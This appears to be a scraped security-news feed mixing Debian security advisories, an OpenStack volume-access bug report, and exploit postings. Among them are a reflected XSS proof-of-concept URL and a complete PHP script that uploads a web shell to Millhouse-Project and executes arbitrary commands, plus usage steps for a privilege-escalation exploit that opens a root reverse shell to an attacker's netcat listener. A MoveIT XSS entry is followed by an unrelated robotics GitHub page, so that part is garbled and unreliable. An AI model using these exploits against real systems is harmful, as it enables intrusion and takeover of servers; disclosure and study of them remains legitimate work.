Debian Linux Security Advisory 5405-1 - It was discovered that missing input sanitizing in the implementation of the OIDCStripCookie option in mod_auth_openidc could result in denial of service.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5405-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
May 18, 2023                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : libapache2-mod-auth-openidc  
CVE ID         : CVE-2023-28625  
Debian Bug     : 1033916

It was discovered that missing input sanitising in the implementation  
of the OIDCStripCookie option in mod_auth_openidc could result in  
denial of service.

For the stable distribution (bullseye), this problem has been fixed in  
version 2.4.9.4-0+deb11u3.

We recommend that you upgrade your libapache2-mod-auth-openidc packages.

For the detailed security status of libapache2-mod-auth-openidc please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/libapache2-mod-auth-openidc

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmRmI/EACgkQEMKTtsN8  
TjbcwQ//X8b4XxzVskGaPquONqmUjMN8ca0u/bEff7oguG9M+5MNDCWKY+8f6kyS  
R7xd7zn2hXJJh5/+fiHcd+tuvE5stMBjATm0Y2f77GypHjoNwTa+G6JYKRhUGqul  
b9CjiosjxtlmaSI2zsrnlVssckqqw56VdgCr7zZf8aw2yyxeZ0zeD81SujaScTm0  
oqJ8Y5TQqrCzNldkmlSykZxjqQ6PPrpR/DrOXh5UB0i9YJqZWnz4ALib2rl4zJXt  
VQhPkSbOEn1gUnN1ypj5IjP74EaLx3ezrMqzMPMmKlNKOerDcHLy04C1dpwg8lET  
RFeT2JrFk9VYTriOjfbzTny55WubRZ3qQKCdoZWS8MwGcZfddt07iJ5746WOwmwp  
mlJ/9WTVR4uX/Z2IldVdfCiSEEOAYk5hQSAV1BGnTQVAlfPQlN50YyDQAxH7D4hs  
R5jBAbblsKyru9EnPrRIqNnYmoFbPoY1c+19LKGulCxtUyawH6gglkB3vq8+e9xv  
yGSjyrTzSCxmkU+RpEExtU3qQiS2NV/MCwCMR5kVYRdGA5SVScSnOJzCR3SoCr8Q  
WmhcCwWLqQCikuxtfmdSsYIHbIIG9XP1Lgwc4quGKD/f/JyySmW+odbIMdTjd61R  
DmFRpb+kRRL54tuexl+xbMSgPhIKMljdetCuoBUZacgJVDpW1Jw=JOw9  
-----END PGP SIGNATURE-----

Debian Security Advisory 5405-1

Debian Linux Security Advisory 5404-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5404-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMay 17, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-2721 CVE-2023-2722 CVE-2023-2723 CVE-2023-2724                 CVE-2023-2725 CVE-2023-2726Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bullseye), these problems have been fixed inversion 113.0.5672.126-1~deb11u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmRlPBIACgkQEMKTtsN8TjaiVg//ffwOJFoQSb/NWsCnX3O5gJc7a+t2fRhwgv8m7fbC5VkxLx8XWPDxV+QrWXkHhGFNdsEIiZ4QNuJHyyz39T824JVAqe0lqOSEHFy1+3RjLiVkZ7zZXN+IQ2VKmdwls+xlSneo1Sv4f4l6yXwTe5xVaqiL9pLDCkL82+cgB1Ut4s8v6gW7B2Vu4HLnuTnsYfOdQmSLOxJ5lFTAsMbpq1TxogZzXK2psrNOh2mHeUkv5V5HaZKuKpOh9vmMaGjKeP+yrii5UDeQCyZYKERIBqQ+PcqEFo1OM0NiWr3WeyBp527Mdw7bZ7VnmH/GmPB3zLoVV/ilEO2/+QwEThom5AAePILrNPX631IMPAt9JMtljtO5Ojl3xMUau060f5zlo+C+ewP8/ZT4d90i18IVhFHyy3309npgSuPyf1o/ofaH9H2NE3bBofN/ySAd5ar7+gYjt97Miuk/tSIm/DU1Q/xWoqo81yEWYqSwfysTOA3Fav+4g0bnfdsWf8QxCBMOvpFphFXx9UMLBc7B9KfLqOdt2YZttAD93RgVggms79DYD/NQE8HixgB4jPIZv6rTQIhuNLloPAelCNK9uUlx/6qdJMKEyoh+W6zLYeZ7QW2oPsDPDO346yCogX48BXTWGEY23JC7+LfEULa27yNVQ9J1c/Okog65iK6kRWQ0whsuN3c=BoPs-----END PGP SIGNATURE-----

Debian Security Advisory 5404-1

Debian Linux Security Advisory 5403-1 - Multiple security issues were discovered in Thunderbird, which could result in denial of service or the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5403-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
May 14, 2023                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : thunderbird  
CVE ID         : CVE-2023-32205 CVE-2023-32206 CVE-2023-32207 CVE-2023-32211   
                 CVE-2023-32212 CVE-2023-32213 CVE-2023-32215

Multiple security issues were discovered in Thunderbird, which could  
result in denial of service or the execution of arbitrary code.

For the stable distribution (bullseye), these problems have been fixed in  
version 1:102.11.0-1~deb11u1.

We recommend that you upgrade your thunderbird packages.

For the detailed security status of thunderbird please refer to its  
security tracker page at:  
https://security-tracker.debian.org/tracker/thunderbird

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmRhMc9fFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0QQgw/9GxNcer8MiXFdQY+lYrRTVxNy2AqwhHz65PFypIRD9h24drCYdzsyFlhE  
bxlr/SqGIuHNZX4B84XIoC079BFp9PsX8lazDteyx5JOKmUMkrXxf1LFsLP/GuWw  
2NtsMp0njJry4FNAnw7hcqtYe+Tyg5ooxmkohAYAedsnLz+tM2gdV3OcKYufy3BB  
PJBa8O8f1Lf/X1ssn2Bt5OTAU5VT99LcCiuq63T/uN3D7mG5QW4q4ApqFJ+l2cF4  
KCP6Q8ITKbZDnDBIp8k1pFfqpEEV2gChYDIW8BXxMqfLWi37E/chhD/xzhG1BNc1  
1JPdjYbB2up1tT6IAYmB/qodb5sZpBEoRwOQLmViJzNItlC9u4h5ppR0oQR0R9AL  
6gcDo2gDWE5wOSqVfoGrzgUl9FyxgDMppl4HzXNzP6qZ5fkCEvKAVcGvMuNy0rAt  
T4Aw5jNl0ePTurCU+zMM8EGdQTqCaEjDnIawfAaEMtv5Hb/wXP8KPPCU8mouUO/E  
iOlQfZS7bqBeZQZgADfnZx3pXQmDYB3fdb0BTsjnD4PJMtpR5YkAJPhAQEkO/ul/  
emNwPVc6G5Ly5k92XVKXeomW1nUugqLKmxyo5eHPgPa4/HJfPWayb5v7XSUIs8T2  
nZo4Zu7CQrQGNghVxY3RlKjfdQ38ty5s3RW4bIlp5RZMmuv59ds=  
=WOGd  
-----END PGP SIGNATURE-----

Debian Security Advisory 5403-1

Debian Linux Security Advisory 5402-1 - Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5402-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
May 13, 2023                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2023-0386 CVE-2023-31436 CVE-2023-32233

Several vulnerabilities have been discovered in the Linux kernel that  
may lead to a privilege escalation, denial of service or information  
leaks.

CVE-2023-0386

    It was discovered that under certain conditions the overlayfs  
    filesystem implementation did not properly handle copy up  
    operations. A local user permitted to mount overlay mounts in user  
    namespaces can take advantage of this flaw for local privilege  
    escalation.

CVE-2023-31436

    Gwangun Jung reported a a flaw causing heap out-of-bounds read/write  
    errors in the traffic control subsystem for the Quick Fair Queueing  
    scheduler (QFQ) which may result in information leak, denial of  
    service or privilege escalation.

CVE-2023-32233

    Patryk Sondej and Piotr Krysiuk discovered a use-after-free flaw in  
    the Netfilter nf_tables implementation when processing batch  
    requests, which may result in local privilege escalation for a user  
    with the CAP_NET_ADMIN capability in any user or network namespace.

For the stable distribution (bullseye), these problems have been fixed in  
version 5.10.179-1.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmRfblBfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0S/ehAAimoZ2PphbMF53apge94ZKEnKKG2k43nEIDBumQsa8tFCmVxHKrxTV+qo  
2OnkmuXO2W7kexlHNtnHfKie7pYI+0vLrxNQqyBBDHfUAvUC7cvVgZUG+O+K9v+r  
TY60UJBkVwW3bY99MUMtwSsy0pN7dHqc/YQTWacPYSVuZ/GRn5/PLhDu9p6vdROD  
BxYtcGF93I0EfGgjCqPZ16rivCwtIck4/GaQCBgypDa2N0h92Y/uTEebaA3LEC72  
DuiJc1kPHpecGe11Xay1+KVt0q3CjwAxbjj740t/ySn+OzGqbSRpLk5IIsLuZL8F  
hh+tsB3PDTpO9yOVNokO7h0wlja03uVFyddwPf8jkv0fsFo26OTkl1aISA6/gmT2  
hymNBwPs5OAxX2f7Fe9jwHllBlLCb+xwiejBcrdNUMOsG2Krd7B5ABlj4shQPylQ  
9NxPHgk9GrCjBFcRaCPoQBaIw5AT7R3Rv7xkyH/XzlXCvuckiJlZMwIw7AVDnRtv  
orZ42xSxaZu1AyIVv48f2JinLrLTBIjj7BQrzq5M+9SXL3bGbv9ChzwoxSK7STc4  
UJ13fZxmQbC50c0xmT1VbiYDIeE85cCOkuF+Heyqw3vJioFFl9tHEt8GT1FrHoUl  
9IcX1l0CB62Sh7s8jdFnvSVur5ZfZbXyUIxWeNIHrF9PinQsVJY=  
=sqnY  
-----END PGP SIGNATURE-----

Debian Security Advisory 5402-1

A flaw was found in OpenStack due to an inconsistency between Cinder and Nova. This issue can be triggered intentionally or by accident. A remote, authenticated attacker could exploit this vulnerability by detaching one of their volumes from Cinder. The highest impact is to confidentiality.

Hello OpenStack Security Team,

I’m writing to you, as we faced a serious security breach in OpenStack functionality(correlated a bit with libvirt, iscsi and huawei driver). I was going through OSSA documents and correlated libvirt notes, but I couldn't find something similar. It is not related to https://security.openstack.org/ossa/OSSA-2020-006.html

In short: we observed that newly created cinder volume(1GB size) was attached to compute node instance, but an instance recognized it as a 115GB volume, which(this 115GB volume) in fact was connected to another instance on the same compute node.

\[1. Test environment\]  
Compute node: OpenStack Ussuri configured with Huawei dorado as a storage backend(configuration driver is available here: https://docs.openstack.org/cinder/rocky/configuration/block-storage/drivers/huawei-storage-driver.html)  
Packages:  
v# dpkg -l | grep libvirt  
ii libvirt-clients 6.0.0-0ubuntu8.16 amd64 Programs for the libvirt library  
ii libvirt-daemon 6.0.0-0ubuntu8.16 amd64 Virtualization daemon  
ii libvirt-daemon-driver-qemu 6.0.0-0ubuntu8.16 amd64 Virtualization daemon QEMU connection driver  
ii libvirt-daemon-driver-storage-rbd 6.0.0-0ubuntu8.16 amd64 Virtualization daemon RBD storage driver  
ii libvirt-daemon-system 6.0.0-0ubuntu8.16 amd64 Libvirt daemon configuration files  
ii libvirt-daemon-system-systemd 6.0.0-0ubuntu8.16 amd64 Libvirt daemon configuration files (systemd)  
ii libvirt0:amd64 6.0.0-0ubuntu8.16 amd64 library for interfacing with different virtualization systems  
ii nova-compute-libvirt 2:21.2.4-0ubuntu1 all OpenStack Compute - compute node libvirt support  
ii python3-libvirt 6.1.0-1 amd64 libvirt Python 3 bindings

\# dpkg -l | grep qemu  
ii ipxe-qemu 1.0.0+git-20190109.133f4c4-0ubuntu3.2 all PXE boot firmware - ROM images for qemu  
ii ipxe-qemu-256k-compat-efi-roms 1.0.0+git-20150424.a25a16d-0ubuntu4 all PXE boot firmware - Compat EFI ROM images for qemu  
ii libvirt-daemon-driver-qemu 6.0.0-0ubuntu8.16 amd64 Virtualization daemon QEMU connection driver  
ii qemu 1:4.2-3ubuntu6.23 amd64 fast processor emulator, dummy package  
ii qemu-block-extra:amd64 1:4.2-3ubuntu6.23 amd64 extra block backend modules for qemu-system and qemu-utils  
ii qemu-kvm 1:4.2-3ubuntu6.23 amd64 QEMU Full virtualization on x86 hardware  
ii qemu-system-common 1:4.2-3ubuntu6.23 amd64 QEMU full system emulation binaries (common files)  
ii qemu-system-data 1:4.2-3ubuntu6.23 all QEMU full system emulation (data files)  
ii qemu-system-gui:amd64 1:4.2-3ubuntu6.23 amd64 QEMU full system emulation binaries (user interface and audio support)  
ii qemu-system-x86 1:4.2-3ubuntu6.23 amd64 QEMU full system emulation binaries (x86)  
ii qemu-utils 1:4.2-3ubuntu6.23 amd64 QEMU utilities

\# dpkg -l | grep nova  
ii nova-common 2:21.2.4-0ubuntu1 all OpenStack Compute - common files  
ii nova-compute 2:21.2.4-0ubuntu1 all OpenStack Compute - compute node base  
ii nova-compute-kvm 2:21.2.4-0ubuntu1 all OpenStack Compute - compute node (KVM)  
ii nova-compute-libvirt 2:21.2.4-0ubuntu1 all OpenStack Compute - compute node libvirt support  
ii python3-nova 2:21.2.4-0ubuntu1 all OpenStack Compute Python 3 libraries  
ii python3-novaclient 2:17.0.0-0ubuntu1 all client library for OpenStack Compute API - 3.x

\# dpkg -l | grep multipath  
ii multipath-tools 0.8.3-1ubuntu2 amd64 maintain multipath block device access

\# dpkg -l | grep iscsi  
ii libiscsi7:amd64 1.18.0-2 amd64 iSCSI client shared library  
ii open-iscsi 2.0.874-7.1ubuntu6.2 amd64 iSCSI initiator tools

\# cat /etc/lsb-release  
DISTRIB\_ID=Ubuntu  
DISTRIB\_RELEASE=20.04  
DISTRIB\_CODENAME=focal  
DISTRIB\_DESCRIPTION="Ubuntu 20.04.4 LTS"

Instance OS: Debian-11-amd64

\[2. Test scenario\]  
Already created instance with two volumes attached. First - 10GB for root system, second - 115GB used as vdb. Recognized by compute node as vda - dm-11, vdb - dm-9:

\# virsh domblklist 90fas439-fc0e-4e22-8d0b-6f2a18eee5c1  
 Target Source  
\-------\-------\-------\-  
 vda /dev/dm-11  
 vdb /dev/dm-9

\# multipath -ll  
(...)  
36e00084100ee7e7ed6ad25d900002f6b dm-9 HUAWEI,XSG1  
size=115G features='0' hwhandler='0' wp=rw  
\`-+- policy='service-time 0' prio=1 status=active  
  |- 14:0:0:4 sdm 8:192 active ready running  
  |- 15:0:0:4 sdo 8:224 active ready running  
  |- 16:0:0:4 sdl 8:176 active ready running  
  \`- 17:0:0:4 sdn 8:208 active ready running  
(...)  
36e00084100ee7e7ed6acaa2900002f6a dm-11 HUAWEI,XSG1  
size=10G features='0' hwhandler='0' wp=rw  
\`-+- policy='service-time 0' prio=1 status=active  
  |- 14:0:0:3 sdq 65:0 active ready running  
  |- 15:0:0:3 sdr 65:16 active ready running  
  |- 16:0:0:3 sdp 8:240 active ready running  
  \`- 17:0:0:3 sds 65:32 active ready running

Creating a new instance, with the same OS guest system and 10GB root volume. After successful deployment, creating a new volume(1GB) size and attaching it to newly created instance. We can see after that:

\# multipath -ll  
(...)  
36e00084100ee7e7ed6ad25d900002f6b dm-9 HUAWEI,XSG1  
size=115G features='0' hwhandler='0' wp=rw  
\`-+- policy='service-time 0' prio=1 status=active  
  |- 14:0:0:10 sdao 66:128 failed faulty running  
  |- 14:0:0:4 sdm 8:192 active ready running  
  |- 15:0:0:10 sdap 66:144 failed faulty running  
  |- 15:0:0:4 sdo 8:224 active ready running  
  |- 16:0:0:10 sdan 66:112 failed faulty running  
  |- 16:0:0:4 sdl 8:176 active ready running  
  |- 17:0:0:10 sdaq 66:160 failed faulty running  
  \`- 17:0:0:4 sdn 8:208 active ready running

This way at instance we were able to see a new drive - not 1GB, but 115GB -> so it seems it was incorrectly attached and this way we were able to destroy some data on that volume.

Additionaly we were able to see many errors like that in compute node logs:

\# dmesg -T | grep dm-9  
\[Fri Jan 27 13:37:42 2023\] blk\_update\_request: critical target error, dev dm-9, sector 62918760 op 0x1:(WRITE) flags 0x8800 phys\_seg 2 prio class 0  
\[Fri Jan 27 13:37:42 2023\] blk\_update\_request: critical target error, dev dm-9, sector 33625152 op 0x1:(WRITE) flags 0x8800 phys\_seg 6 prio class 0  
\[Fri Jan 27 13:37:46 2023\] blk\_update\_request: critical target error, dev dm-9, sector 66663000 op 0x1:(WRITE) flags 0x8800 phys\_seg 5 prio class 0  
\[Fri Jan 27 13:37:46 2023\] blk\_update\_request: critical target error, dev dm-9, sector 66598120 op 0x1:(WRITE) flags 0x8800 phys\_seg 5 prio class 0  
\[Fri Jan 27 13:37:51 2023\] blk\_update\_request: critical target error, dev dm-9, sector 66638680 op 0x1:(WRITE) flags 0x8800 phys\_seg 12 prio class 0  
\[Fri Jan 27 13:37:56 2023\] blk\_update\_request: critical target error, dev dm-9, sector 66614344 op 0x1:(WRITE) flags 0x8800 phys\_seg 1 prio class 0  
\[Fri Jan 27 13:37:56 2023\] blk\_update\_request: critical target error, dev dm-9, sector 66469296 op 0x1:(WRITE) flags 0x8800 phys\_seg 24 prio class 0  
\[Fri Jan 27 13:37:56 2023\] blk\_update\_request: critical target error, dev dm-9, sector 66586472 op 0x1:(WRITE) flags 0x8800 phys\_seg 3 prio class 0  
(...)

Unfortunately we do not know what is a perfect test-scenario for it as we could face such issue in less than 2% of our tries, but it looks like a serious security breach.

Additionally we observed that linux kernel is not fully clearing a device allocation(from volume detach), so some of drives names are visible in an output, i.e. lsblk command. Then, after new volume attachment we can see such names(i.e. sdao, sdap, sdan and so on) are reusable by that drive and wrongly mapped by multipath/iscsi to another drive and this way we hit an issue.  
Our question is why linux kernel of compute node is not removing devices allocation and this way is leading to a scenario like that? Maybe this can be a solution here.

Thanks in advance for your help and understanding. In case when more details is needed, do not hesitate to contact me.

CVE-2023-2088: Bug #2004555 “[OSSA-2023-003] Unauthorized volume access through...” : Bugs : OpenStack Compute (nova)

Debian Linux Security Advisory 5401-1 - Two security issues were found in PostgreSQL, which may result in privilege escalation or incorrect policy enforcement.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5401-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMay 11, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : postgresql-13CVE ID         : CVE-2023-2454 CVE-2023-2455Two security issues were found in PostgreSQL, which may result inprivilege escalation or incorrect policy enforcement.For the stable distribution (bullseye), these problems have been fixed inversion 13.11-0+deb11u1.We recommend that you upgrade your postgresql-13 packages.For the detailed security status of postgresql-13 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/postgresql-13Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmRdF+kACgkQEMKTtsN8TjZnMA/+OW6jZvbc8StDbvz+I23baEoZizDuXYQ+LxMTBlXQMU52AsZqOOVNHWkcwWG2DtZRNWVPUftfJORenpjDMviqR+/yBJLlOu4jH68V8EFtv1I9jk70AmOGccL4mYSr66iawcIpzQFo5mv/BcMREI5raSNT/tFDtIBRfQlEYMwLfnBfprN/DGzn5x/p4Wn/7AH7a0Gu2S69YaEpgMo4eJ3g9wEsG8wgDNUieNXT67BH2qRt0h/9My2bsNVv/b0XkX+0wlDEOAd9TJSTcSqOXIlJ/8UV9DPlZE202RzrFrrcYuIyJUxdKyBDHnOTW/uWkNBTjUcE72RsSmN8XtygUA/YJIk8jtbTLSysyoSb0ONNbKo74HCwKOLTzyoR84SEd5IknZRWfmszL0wZj8qy3YWrPes2mqfFQYWXGPrjPFJmkksWU0fmuLD8rt7L02XSPoWbM47FNA+12lKqFEb39woCxo/D46G2QX0c6gIm9oeyYg1WUApmVBqRkDsps/Fv1kBeyTzq7MGUEWjpNiJaHSna3j893kr7cfnTcBe5OgKe/7yijVIf7bSoGmcvLvlb6zqQ7K5V/Mv8he9k6eInvpiIzEDTCL+BI3tXde3BO/TMTFgpgSXOAizIB+PXVz6TzW07blMzNxhKl6YqVpWt7tMtRefLdzg4CMA3QMrvzv8zPXU=D+6d-----END PGP SIGNATURE-----

Debian Security Advisory 5401-1

Millhouse-Project version 1.414 suffers from a cross site scripting vulnerability.

Change Mirror Download

    <?php/*Exploit Title: thrsrossi Millhouse-Project 1.414 - register - Reflected xssDate: 12/05/2023Exploit Author: Chokri HammediVendor Homepage: https://github.com/thrsrossi/Millhouse-ProjectSoftware Link: https://github.com/thrsrossi/Millhouse-Project.gitVersion: 1.414Tested on: DebianCVE: N/A*/?>POC:http://target/views/register.php?error=%3Cscript%3Ealert(%27rose1337%27)%3C/script%3E

Millhouse-Project 1.414 Cross Site Scripting

Millhouse-Project version 1.414 suffers from a remote shell upload vulnerability.

    <?php/*Exploit Title: thrsrossi Millhouse-Project 1.414 Remote Code ExecutionDate: 12/05/2023Exploit Author: Chokri HammediVendor Homepage: https://github.com/thrsrossi/Millhouse-ProjectSoftware Link: https://github.com/thrsrossi/Millhouse-Project.gitVersion: 1.414Tested on: DebianCVE: N/A*/$options = getopt('u:c:');if(!isset($options['u'], $options['c']))die("\033[1;32m \n Millhouse Remote Code Execution \n Author: Chokri Hammedi\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n\033[0m\n\n");$target     =  $options['u'];$command    =  $options['c'];$url = $target . '/includes/add_post_sql.php';$post = '------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="title"helloworld------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="description"<p>sdsdsds</p>------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="category"1------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="image"; filename="rose.php"Content-Type: application/x-php<?php$shell = shell_exec("' . $command . '");echo $shell;?>------WebKitFormBoundaryzlHN0BEvvaJsDgh8--';$headers = array(    'Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryzlHN0BEvvaJsDgh8',    'Cookie: PHPSESSID=rose1337',);$ch = curl_init($url);curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_POSTFIELDS, $post);curl_setopt($ch, CURLOPT_POST, true);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_HEADER, true);$response = curl_exec($ch);curl_close($ch);// execute command$shell = "{$target}/images/rose.php?cmd=" . urlencode($command);$ch = curl_init($shell);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);$exec_shell = curl_exec($ch);curl_close($ch);echo "\033[1;32m \n".$exec_shell . "\033[0m\n \n";?>

Millhouse-Project 1.414 Shell Upload

Incorrect access control in Quick Heal Technologies Limited Seqrite Endpoint Security (EPS) all versions prior to v8.0 allows attackers to escalate privileges to root via supplying a crafted binary to the target system.

**EPScalate**

An elevation of privilege vulnerability in QuickHeal's Seqrite Enterprise Endpoint Security Solution (EPS).

poc.mp4**Vendor and Product Details**

*   **Vendor**: Quick Heal Technologies Limited
*   **Product**: Seqrite Endpoint Security (EPS)
*   **Product Homepage**: https://www.seqrite.com/endpoint-security/seqrite-endpoint-security
*   **Affected Versions**: Affects all versions prior to v8.0.

**Vulnerability Details**

Seqrite endpoint security with its default installation installs to /usr/lib/Seqrite/ with very weak directory and file permissions granting a local user full read/write permission to the contents of the directory. In addition, the installation procedure installs its startup scripts to /etc/init.d/ which are world writable. This enables any low-privilege user on the system to escalate privileges to root.

The exploit makes use of 2 different vulnerabilities introduced by the software to elevate privileges on the system. Firstly, the fact that the application uses scripts in /etc/init.d/ to start its scan processes which can be written to by any user. Secondly, the application makes use shared objects to dynamically load position-independent code (PIC) during runtime. As a matter of fact, all of the executable shared object files are world writable. Lastly, the application binaries used for the daemon process are world writable which basically means any non-privileged user could overwrite the scanner binaries with a reverse shell binary to execute arbitrary code as root.

**Exploit Usage**

The exploit is a simple Python file that aids in the exploitation of the vulnerability.

Steps:

1.  On the attacker machine, start a listener using netcat (nc -lvp <port>) or metasploit (multi/handler).
2.  Copy/download the epscalate.py and shellcode.c file onto the target system.
3.  Run the python file with proper arguments (python3 epscalate.py -H 192.168.0.103:9999 -I).
4.  Wait for the AV to reload / the system to reboot.
5.  The reverse connection to your listener can confirm code execution as root.

Exploit help:

$ python epscalate.py -h

    EPSCALATE - PoC for privesc in Seqrite EPS
                ~ 0xInfection

usage: epscalate.py -H <host>:<port> <technique\_flag>

options:
  -h, --help            show this help message and exit
  -H HOSTPORT, --hostport HOSTPORT
                        The IP and port of the listening attacker machine in format of <ip>:<port>
  -B, --daemon-binaries
                        Overwrite the main daemon binaries to escalate privileges.
  -I, --initd-scripts   Posion /etc/init.d/ bash startup scripts with a reverse shell to escalate privileges.

**Support**

The exploit has been tested on all Debian and Ubuntu-based variant operating systems.

**License & Credits**

The exploit code has been published under the Apache 2.0 License. The vulnerability has been disclosed to the vendor and has been remediated at the time of publishing the vulnerability.

Vulnerability and exploit credits: Pinaki Mondal (0xInfection).

CVE-2023-31497: GitHub - 0xInfection/EPScalate: Exploit for elevation of privilege vulnerability in QuickHeal's Seqrite EPS.

Progress Ipswitch MoveIT 1.1.11 was discovered to contain a cross-site scripting (XSS) vulenrability via the API authentication function.

noetic-devel

Switch branches/tags

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**9** branches **69** tags

Code

*   Clone
    
    Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

 

ivatavuk and rhaschke Fix Jacobian calculation for planar joint (#3439)

67121a3

May 28, 2023

Fix Jacobian calculation for planar joint (#3439)

67121a3

**Git stats**

*   **7,879** commits

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

.docker

Dockerfile: Update ci-shadow-fixed -> ci-testing

September 3, 2022 06:52

.github

CI: Bump mamba-org/provision-with-micromamba from 14 to 16 (#3438)

May 28, 2023 12:28

moveit

1.1.12

May 13, 2023 20:56

moveit\_commander

1.1.12

May 13, 2023 20:56

moveit\_core

Fix Jacobian calculation for planar joint (#3439)

May 28, 2023 13:04

moveit\_experimental

Fix (some) doxygen warnings (#3315)

January 25, 2023 12:03

moveit\_kinematics

1.1.12

May 13, 2023 20:56

moveit\_planners

1.1.12

May 13, 2023 20:56

moveit\_plugins

1.1.12

May 13, 2023 20:56

moveit\_ros

1.1.12

May 13, 2023 20:56

moveit\_runtime

1.1.12

May 13, 2023 20:56

moveit\_setup\_assistant

1.1.12

May 13, 2023 20:56

.clang-format

Tweak penalties

August 11, 2020 08:28

.clang-tidy

add clang-tidy check for bind()

April 2, 2022 22:48

.dockerignore

Explicitly list all package.xml to include

August 26, 2021 16:40

.gitignore

Python bindings for moveit\_core (#2547)

April 3, 2021 09:56

.pre-commit-config.yaml

pre-commit: Update black version

March 29, 2022 18:43

CODE\_OF\_CONDUCT.md

Fix formatting errors

March 25, 2021 22:40

CONTRIBUTING.md

Remove ! from MoveIt name (#1590)

August 2, 2019 12:42

LICENSE.txt

Add license file to root of project (#349)

November 14, 2016 10:30

MIGRATION.md

rename MGI::getJointNames() to getVariableNames()

February 20, 2023 14:08

README.md

version.h: automatically bump patch number for devel builds (#3211)

December 19, 2022 15:17

codecov.yaml

\[maint\] Remove patch status from codecov (#2306)

September 12, 2020 12:27

moveit.rosinstall

Update panda\_moveit\_config to noetic-devel in .rosinstall files

September 9, 2022 08:17

Branches Policy MoveIt Status Continuous Integration Licenses ROS Buildfarm Stargazers over time

**README.md**

The MoveIt Motion Planning Framework for ROS. For the ROS 2 repository see MoveIt 2.

_Easy-to-use open source robotics manipulation platform for developing commercial applications, prototyping designs, and benchmarking algorithms._

*   Overview of MoveIt
*   Installation Instructions
*   Documentation
*   Get Involved

**Branches Policy**

*   We develop latest features on master.
